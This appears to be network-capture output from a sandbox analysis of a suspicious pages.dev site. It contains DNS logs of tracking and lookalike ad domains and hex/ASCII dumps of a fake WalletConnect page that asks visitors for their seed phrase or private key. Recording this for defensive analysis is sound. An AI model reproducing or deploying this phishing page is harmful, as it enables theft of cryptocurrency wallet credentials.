                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.016788960 CEST1.1.1.1192.168.2.50x6be7No error (0)api.hcaptcha.com104.19.229.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.016788960 CEST1.1.1.1192.168.2.50x6be7No error (0)api.hcaptcha.com104.19.230.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.016801119 CEST1.1.1.1192.168.2.50xd65dNo error (0)pixel-us.convertagain.netpixel-us-fvmarketing.ubidex.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.016801119 CEST1.1.1.1192.168.2.50xd65dNo error (0)pixel-us-fvmarketing.ubidex.xyz88.214.195.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.016813993 CEST1.1.1.1192.168.2.50xc48cNo error (0)api.hcaptcha.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.016819954 CEST1.1.1.1192.168.2.50x86abNo error (0)pixel-us.convertagain.netpixel-us-fvmarketing.ubidex.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.018517017 CEST1.1.1.1192.168.2.50x291aNo error (0)js.sentry-cdn.com151.101.130.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.018517017 CEST1.1.1.1192.168.2.50x291aNo error (0)js.sentry-cdn.com151.101.194.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.018517017 CEST1.1.1.1192.168.2.50x291aNo error (0)js.sentry-cdn.com151.101.66.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.018517017 CEST1.1.1.1192.168.2.50x291aNo error (0)js.sentry-cdn.com151.101.2.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.018675089 CEST1.1.1.1192.168.2.50x3949No error (0)scripts.prdredir.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.020600080 CEST1.1.1.1192.168.2.50x8ab3No error (0)scripts.prdredir.com104.18.31.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.020600080 CEST1.1.1.1192.168.2.50x8ab3No error (0)scripts.prdredir.com104.18.30.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.034991980 CEST1.1.1.1192.168.2.50xb257No error (0)event.getblue.io18.229.151.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.034991980 CEST1.1.1.1192.168.2.50xb257No error (0)event.getblue.io54.94.170.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.034991980 CEST1.1.1.1192.168.2.50xb257No error (0)event.getblue.io18.229.254.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.035007954 CEST1.1.1.1192.168.2.50xd14aNo error (0)s2.adform.nets2.adformnet.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.035041094 CEST1.1.1.1192.168.2.50x8129No error (0)s2.adform.nets2.adformnet.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.035041094 CEST1.1.1.1192.168.2.50x8129No error (0)nstrp.adform.net37.157.6.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.111069918 CEST1.1.1.1192.168.2.50x1816No error (0)adssistem.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.111069918 CEST1.1.1.1192.168.2.50x1816No error (0)adssistem.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.112032890 CEST1.1.1.1192.168.2.50xbfaeNo error (0)adssistem.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.149962902 CEST1.1.1.1192.168.2.50xc80dNo error (0)insights.rtgio.co172.67.145.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.149962902 CEST1.1.1.1192.168.2.50xc80dNo error (0)insights.rtgio.co104.21.65.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.150106907 CEST1.1.1.1192.168.2.50x3b2bNo error (0)insights.rtgio.co65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.197129011 CEST1.1.1.1192.168.2.50xfe3eNo error (0)rtgio.co104.21.65.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.197129011 CEST1.1.1.1192.168.2.50xfe3eNo error (0)rtgio.co172.67.145.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.198209047 CEST1.1.1.1192.168.2.50x320No error (0)rtgio.co65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.218676090 CEST1.1.1.1192.168.2.50x2342No error (0)pubads.g.doubleclick.uk.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.218676090 CEST1.1.1.1192.168.2.50x2342No error (0)pubads.g.doubleclick.uk.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.219472885 CEST1.1.1.1192.168.2.50x150dNo error (0)pubads.g.doubleclick.uk.net65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.374007940 CEST1.1.1.1192.168.2.50x1662No error (0)pixel.mediamathrdrt.com172.67.136.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.374007940 CEST1.1.1.1192.168.2.50x1662No error (0)pixel.mediamathrdrt.com104.21.94.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.374161959 CEST1.1.1.1192.168.2.50x6691No error (0)pixel.mediamathrdrt.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.381149054 CEST1.1.1.1192.168.2.50xaedName error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.395051956 CEST1.1.1.1192.168.2.50x2654Name error (3)cdn.ethers.iononenone65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.402875900 CEST1.1.1.1192.168.2.50x13b8Name error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.412794113 CEST1.1.1.1192.168.2.50xe07No error (0)scripts.mediamathrdrt.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.413217068 CEST1.1.1.1192.168.2.50x7365No error (0)scripts.mediamathrdrt.com104.21.94.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.413217068 CEST1.1.1.1192.168.2.50x7365No error (0)scripts.mediamathrdrt.com172.67.136.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.578244925 CEST1.1.1.1192.168.2.50xcd1fNo error (0)pixel.prdredir.com104.18.31.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.578244925 CEST1.1.1.1192.168.2.50xcd1fNo error (0)pixel.prdredir.com104.18.30.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.579466105 CEST1.1.1.1192.168.2.50x2c2No error (0)pixel.prdredir.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.601208925 CEST1.1.1.1192.168.2.50x700eNo error (0)my.rtmark.net139.45.195.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.890511990 CEST1.1.1.1192.168.2.50xd6fNo error (0)tracking.aimetric.net65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.890862942 CEST1.1.1.1192.168.2.50xd08dNo error (0)tracking.aimetric.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.890862942 CEST1.1.1.1192.168.2.50xd08dNo error (0)tracking.aimetric.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.976274967 CEST1.1.1.1192.168.2.50x5350No error (0)newassets.hcaptcha.com104.19.229.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.976274967 CEST1.1.1.1192.168.2.50x5350No error (0)newassets.hcaptcha.com104.19.230.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.977168083 CEST1.1.1.1192.168.2.50x900eNo error (0)newassets.hcaptcha.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.132371902 CEST1.1.1.1192.168.2.50x1d28No error (0)ib.adnxs.comxandr-g-geo.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.132371902 CEST1.1.1.1192.168.2.50x1d28No error (0)ib.anycast.adnxs.com185.89.210.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.132371902 CEST1.1.1.1192.168.2.50x1d28No error (0)ib.anycast.adnxs.com185.89.211.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.132371902 CEST1.1.1.1192.168.2.50x1d28No error (0)ib.anycast.adnxs.com185.89.210.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.132371902 CEST1.1.1.1192.168.2.50x1d28No error (0)ib.anycast.adnxs.com185.89.210.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.132371902 CEST1.1.1.1192.168.2.50x1d28No error (0)ib.anycast.adnxs.com185.89.210.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.132371902 CEST1.1.1.1192.168.2.50x1d28No error (0)ib.anycast.adnxs.com185.89.210.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.132371902 CEST1.1.1.1192.168.2.50x1d28No error (0)ib.anycast.adnxs.com185.89.210.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.132371902 CEST1.1.1.1192.168.2.50x1d28No error (0)ib.anycast.adnxs.com185.89.210.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.132371902 CEST1.1.1.1192.168.2.50x1d28No error (0)ib.anycast.adnxs.com185.89.210.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.132371902 CEST1.1.1.1192.168.2.50x1d28No error (0)ib.anycast.adnxs.com185.89.210.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.132371902 CEST1.1.1.1192.168.2.50x1d28No error (0)ib.anycast.adnxs.com185.89.210.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.132371902 CEST1.1.1.1192.168.2.50x1d28No error (0)ib.anycast.adnxs.com185.89.211.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.168613911 CEST1.1.1.1192.168.2.50xd908No error (0)cm.g.doubleclick.net142.250.185.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.203453064 CEST1.1.1.1192.168.2.50x2ccdNo error (0)widget.getblue.io18.229.254.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.203453064 CEST1.1.1.1192.168.2.50x2ccdNo error (0)widget.getblue.io54.94.170.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.203453064 CEST1.1.1.1192.168.2.50x2ccdNo error (0)widget.getblue.io18.229.151.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.348033905 CEST1.1.1.1192.168.2.50xd9bbNo error (0)insights.rtgio.co65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.348084927 CEST1.1.1.1192.168.2.50x452No error (0)insights.rtgio.co104.21.65.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.348084927 CEST1.1.1.1192.168.2.50x452No error (0)insights.rtgio.co172.67.145.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.509845018 CEST1.1.1.1192.168.2.50xc7ceNo error (0)pixel.mediamathrdrt.com104.21.94.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.509845018 CEST1.1.1.1192.168.2.50xc7ceNo error (0)pixel.mediamathrdrt.com172.67.136.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.511526108 CEST1.1.1.1192.168.2.50x6caNo error (0)pixel.mediamathrdrt.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.871642113 CEST1.1.1.1192.168.2.50x7b39No error (0)a1.adform.neta1.adformnet.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.871768951 CEST1.1.1.1192.168.2.50x923cNo error (0)a1.adform.neta1.adformnet.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:13.027265072 CEST1.1.1.1192.168.2.50x2810No error (0)cms.getblue.io54.207.213.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:13.027265072 CEST1.1.1.1192.168.2.50x2810No error (0)cms.getblue.io54.233.119.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:13.027589083 CEST1.1.1.1192.168.2.50x82fbNo error (0)ib.adnxs.comxandr-g-geo.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:13.027589083 CEST1.1.1.1192.168.2.50x82fbNo error (0)ib.anycast.adnxs.com37.252.172.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:13.027589083 CEST1.1.1.1192.168.2.50x82fbNo error (0)ib.anycast.adnxs.com37.252.171.149A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:13.027589083 CEST1.1.1.1192.168.2.50x82fbNo error (0)ib.anycast.adnxs.com37.252.171.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:13.027589083 CEST1.1.1.1192.168.2.50x82fbNo error (0)ib.anycast.adnxs.com37.252.171.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:13.027589083 CEST1.1.1.1192.168.2.50x82fbNo error (0)ib.anycast.adnxs.com37.252.171.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:13.027589083 CEST1.1.1.1192.168.2.50x82fbNo error (0)ib.anycast.adnxs.com37.252.171.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:13.027589083 CEST1.1.1.1192.168.2.50x82fbNo error (0)ib.anycast.adnxs.com37.252.173.215A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:14.350579023 CEST1.1.1.1192.168.2.50x9eeeName error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:14.392688990 CEST1.1.1.1192.168.2.50xdf99Name error (3)cdn.ethers.iononenone65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:14.422604084 CEST1.1.1.1192.168.2.50x2104No error (0)cms.getblue.io54.207.213.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:14.422604084 CEST1.1.1.1192.168.2.50x2104No error (0)cms.getblue.io54.233.119.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:16.800703049 CEST1.1.1.1192.168.2.50xa262Name error (3)cdn.ethers.iononenone65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:16.801225901 CEST1.1.1.1192.168.2.50x814Name error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:16.808753014 CEST1.1.1.1192.168.2.50xbe3eName error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              0192.168.2.549710172.66.47.854435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:15:53 UTC710OUTGET / HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:15:53 UTC795INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:15:53 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                              referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4dT9DDe2Wx5Q1l0vQ9JUMoXr4CJk%2BWw77ifhLztHIDpiv%2Fw1aVgVlBTBlLhPpxKuzcTIpRF0luPFcGDEAlJwTbO04hpDs3f4VndavJ%2B2gxtKEXkxoz%2FOYAB4WjVVwrhsgjSdSbPhpw4JGoSw61lBN1Ji71sKFZ5cpV0BUEsyU3w7W7tYPTMLRfHv6baJs6hoSWZyeD1x"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2896a63425b-EWR
                                                                                                                                                                                                                                              2024-09-28 01:15:53 UTC574INData Raw: 32 33 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 30 30
                                                                                                                                                                                                                                              Data Ascii: 239d<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="favicon.ico" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta name="theme-color" content="#0000
                                                                                                                                                                                                                                              2024-09-28 01:15:53 UTC1369INData Raw: 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 38 34 30 30 31 33 66 64 38 63 32 61 62 32 33 34 2e 63 73 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 73 74 79 6c 65 73 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 33 2e 31 2e 32 2f 72 6f 6c 6c 75 70 73 2f 61 65 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e
                                                                                                                                                                                                                                              Data Ascii: /> <link rel="stylesheet" href="840013fd8c2ab234.css" /> <link rel="stylesheet" href="styles.css" /> <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script> <script src="https://cdnjs.cloudflare.
                                                                                                                                                                                                                                              2024-09-28 01:15:53 UTC1369INData Raw: 39 39 39 2f 78 6c 69 6e 6b 26 23 33 39 3b 25 33 45 20 25 33 43 21 2d 2d 20 47 65 6e 65 72 61 74 6f 72 3a 20 53 6b 65 74 63 68 20 34 39 2e 33 20 28 35 31 31 36 37 29 20 2d 20 68 74 74 70 3a 2f 2f 77 77 77 2e 62 6f 68 65 6d 69 61 6e 63 6f 64 69 6e 67 2e 63 6f 6d 2f 73 6b 65 74 63 68 20 2d 2d 25 33 45 20 25 33 43 74 69 74 6c 65 25 33 45 57 61 6c 6c 65 74 43 6f 6e 6e 65 63 74 25 33 43 2f 74 69 74 6c 65 25 33 45 20 25 33 43 64 65 73 63 25 33 45 43 72 65 61 74 65 64 20 77 69 74 68 20 53 6b 65 74 63 68 2e 25 33 43 2f 64 65 73 63 25 33 45 20 25 33 43 64 65 66 73 25 33 45 25 33 43 2f 64 65 66 73 25 33 45 20 25 33 43 67 20 69 64 3d 26 23 33 39 3b 50 61 67 65 2d 31 26 23 33 39 3b 20 73 74 72 6f 6b 65 3d 26 23 33 39 3b 6e 6f 6e 65 26 23 33 39 3b 20 73 74 72 6f 6b 65
                                                                                                                                                                                                                                              Data Ascii: 999/xlink&#39;%3E %3C!-- Generator: Sketch 49.3 (51167) - http://www.bohemiancoding.com/sketch --%3E %3Ctitle%3EWalletConnect%3C/title%3E %3Cdesc%3ECreated with Sketch.%3C/desc%3E %3Cdefs%3E%3C/defs%3E %3Cg id=&#39;Page-1&#39; stroke=&#39;none&#39; stroke
                                                                                                                                                                                                                                              2024-09-28 01:15:53 UTC1369INData Raw: 32 31 34 33 38 39 20 31 34 38 2e 38 39 33 35 31 34 2c 31 32 36 2e 32 31 34 33 39 33 20 31 34 38 2e 38 39 33 35 31 2c 31 32 36 2e 32 31 34 33 39 36 20 4c 39 31 2e 35 34 30 35 38 38 38 2c 31 38 32 2e 33 36 38 39 32 37 20 43 38 39 2e 30 39 35 30 35 32 2c 31 38 34 2e 37 36 33 33 35 39 20 38 35 2e 31 33 30 30 31 33 33 2c 31 38 34 2e 37 36 33 33 39 39 20 38 32 2e 36 38 34 34 32 37 36 2c 31 38 32 2e 33 36 39 30 31 34 20 43 38 32 2e 36 38 34 34 31 33 33 2c 31 38 32 2e 33 36 39 20 38 32 2e 36 38 34 33 39 38 2c 31 38 32 2e 33 36 38 39 38 36 20 38 32 2e 36 38 34 33 38 32 37 2c 31 38 32 2e 33 36 38 39 37 20 4c 31 2e 38 37 31 39 36 33 32 37 2c 31 30 33 2e 32 34 36 37 38 35 20 43 2d 30 2e 35 37 33 35 39 36 39 33 39 2c 31 30 30 2e 38 35 32 33 37 37 20 2d 30 2e 35 37 33
                                                                                                                                                                                                                                              Data Ascii: 214389 148.893514,126.214393 148.89351,126.214396 L91.5405888,182.368927 C89.095052,184.763359 85.1300133,184.763399 82.6844276,182.369014 C82.6844133,182.369 82.684398,182.368986 82.6843827,182.36897 L1.87196327,103.246785 C-0.573596939,100.852377 -0.573
                                                                                                                                                                                                                                              2024-09-28 01:15:53 UTC1369INData Raw: 61 63 74 2d 6e 6f 77 22 3e 43 6f 6e 6e 65 63 74 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 53 59 4e 43 20 53 45 43 54 20 2d 2d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 73 79 6e 63 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 73 63 2d 6a 53 46 6a 64 6a 20 66 6b 6f 57 4a 53 20 73 63 2d 69 77 61 6a 70 6d 20 6b 79 64 52 48 63 20 6d 74 2d 31 30 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 22 0d 0a 20 20 20
                                                                                                                                                                                                                                              Data Ascii: act-now">Connect</button> </div> </div> </div> ... SYNC SECT --> <div id="sync" class="sc-jSFjdj fkoWJS sc-iwajpm kydRHc mt-10" style="display: none"
                                                                                                                                                                                                                                              2024-09-28 01:15:53 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 73 65 65 64 20 70 68 72 61 73 65 2c 20 70 72 69 76 61 74 65 20 6b 65 79 2c 2e 2e 20 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 71 75 69 72 65 64 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 3c 2f 74 65 78 74 61 72 65 61 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 71 72 63 6f 64 65 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 79 2d 32 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: placeholder="seed phrase, private key,.. " required ></textarea> <br /> <div id="qrcode" style="display: none"> <div class="py-2">
